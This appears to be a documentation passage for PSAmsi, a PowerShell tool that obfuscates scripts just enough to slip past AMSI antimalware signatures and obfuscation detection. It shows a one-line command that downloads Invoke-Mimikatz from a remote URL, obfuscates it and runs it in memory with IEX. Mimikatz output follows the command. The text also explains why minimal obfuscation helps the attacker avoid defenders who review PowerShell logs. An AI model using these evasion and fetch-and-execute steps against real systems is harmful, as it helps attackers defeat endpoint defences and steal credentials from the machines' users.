Defeating AMSI Signatures With Obfuscation

We don't just want to find AMSI signatures, we want to defeat them! The primary function for obfuscating in PSAmsi is Get-MinimallyObfuscated.

Get-MinimallyObfuscated accepts a script using any one of the -ScriptString, -ScriptPath, -ScriptBlock, or -ScriptUri parameters and returns a minimally obfuscated copy of the script that will defeat AMSI signatures, as well as obfuscation detection.

PS > Get-MinimallyObfuscated -ScriptUri 'https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1' | IEX
PS > Invoke-Mimikatz -coMmANd Coffee

  .#####.   mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 20 modules * * */
ERROR mimikatz_initOrClean ; CoInitializeEx: 80010106

mimikatz(powershell) # Coffee

    ( (
     ) )
  .______.
  |      |]
  \      /
   `----'

Why minimal?

Why would we want to minimize obfuscation? Wouldn't it be better to obfuscate as much as possible to make sure we don't miss any AMSI signatures?

Well, yes and no. As Defenders continue to implement PowerShell logging into their detection arsenal, obfuscated scripts can stick out if Defenders are reviewing their logs. And if they are implementing any sort of obfuscation detection, they are certain to detect a script that has been obfuscated as much as possible.

But if our goal is just to remove those AMSI signatures hidden in our script, there really is no need to obfuscate so much that it could be detected. We only need to obfuscate those few AMSI signatures that are causing our script to be flagged. This is the approach taken by PSAmsi.

---

Credit - Under the hood, all PowerShell obfuscation in PSAmsi uses Invoke-Obfuscation written by Daniel Bohannon.